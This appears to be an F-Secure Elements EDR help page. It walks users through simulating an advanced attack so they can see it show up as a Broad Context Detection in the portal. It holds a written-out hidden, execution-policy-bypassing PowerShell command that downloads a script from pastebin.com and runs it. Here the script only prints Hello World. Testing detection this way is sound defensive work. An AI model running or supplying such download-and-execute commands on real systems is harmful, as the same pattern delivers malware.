You can use this test to view what an advanced attack in the organization network may look like in the F-Secure Elements Endpoint Detection and Response portal.
For this test, you need:
- a Windows workstation that is running the Sensor, and
- an access to the F-Secure Elements Endpoint Detection and Response portal.
Note: We recommend that you run all attack simulations in isolated test environments, for example with disposable virtual machines.
In this test, you create a .bat file that uses Windows PowerShell to download code from a 3rd-party website. This example downloads the following harmless code from pastebin.com:# Filename: Hello.ps1
Write-Host
Write-Host ‘Hello World!’
Write-Host
# end of script
To run the test, follow these instructions:
-
- Log in to the monitored endpoint where you have deployed the sensor.
- Open the Notepad text editor.
- Add the following command on one line:
“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object
System.Net.WebClient).DownloadFile(‘https://pastebin.com/raw/gRvH8a8z’,\”$env:temp\powershell.ps1\”);
Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1
-
- Save the file as hello-world.bat.
- Run the .bat file on the endpoint.
- Log out from the monitored endpoint.
- Log in to the F-Secure Elements Endpoint Detection and Response portal.
- View the recent Broad Context Detections.
The created event should be listed in the recent events.